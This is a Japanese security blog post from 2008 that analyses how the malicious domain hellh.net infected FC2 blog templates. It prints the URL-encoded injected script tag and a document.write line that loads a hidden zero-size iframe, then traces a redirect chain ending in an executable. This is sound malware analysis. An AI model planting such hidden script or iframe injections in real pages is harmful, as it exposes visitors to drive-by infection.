ハルコタン紀行

hellh.netその4

いくつかのFC2ブログのテンプレートにiframeが仕込まれていましたが、scriptも使うようになりました。
<script src="http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
デコードします。
<script src="http://www.hellh.net/w.js"></script>

http://www.hellh.net/w.js
を見てみましょう。
document.write("<iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74 width=0 height=0></iframe>");
デコードします。
document.write("<iframe src=http://www.hellh.net width=0 height=0></iframe>");
というわけで、動作は今までのiframeと同じです。

ついでにhellh.netが更新されているので見てみましょう。
Default.htmが以下をiframeで呼び出します。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%68%65%61%64%2E%61%73%70
デコードします。
http://www.hellh.net/head.asp
おっと、ASPです(CGIみたいなもの)。
処理は推測するしかありませんが、おそらく以下のようになっています。

初回アクセスのHTTPヘッダ
Location: error.htm
次回アクセスのHTTPヘッダ
Location: http://search.fc2.com

解析を避けるためか、2回目以降はFC2に飛ばしてしまいます。
ということで以前のDefault.htmに相当するページは
http://www.hellh.net/error.htm
となります。

IISのエラーページを装ったerror.htmは以下の2つをiframeで呼び出します。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%64%76%2E%68%74%6D
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%76%69%70%2E%68%74%6D
デコードします。
http://www.hellh.net/dv.htm
http://www.hellh.net/vip.htm
以前とのページ構成の違いは以下のようになっています。

以前
/Default.htm
→index.htm (スクリプトその1)
→re.htm (スクリプトその2)

今回
/Default.htm
→head.asp
 →(初回) error.htm
  →dv.htm (スクリプトその1)
  →vip.htm (スクリプトその2)
 →(次回) http://search.fc2.com

ASPでの処理が入るため複雑になっています(Default.aspで処理したほうがいいと思いますけどね)。

http://www.hellh.net/dv.htm

http://www.hellh.net/vip.htm


http://www.hellh.net/vip.exe
VirusTotal

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/20(木) 23:36:50|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<fccja.comその1 | ホーム | 移動魔法>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/11-3105b8a6
この記事にトラックバックする(FC2ブログユーザー)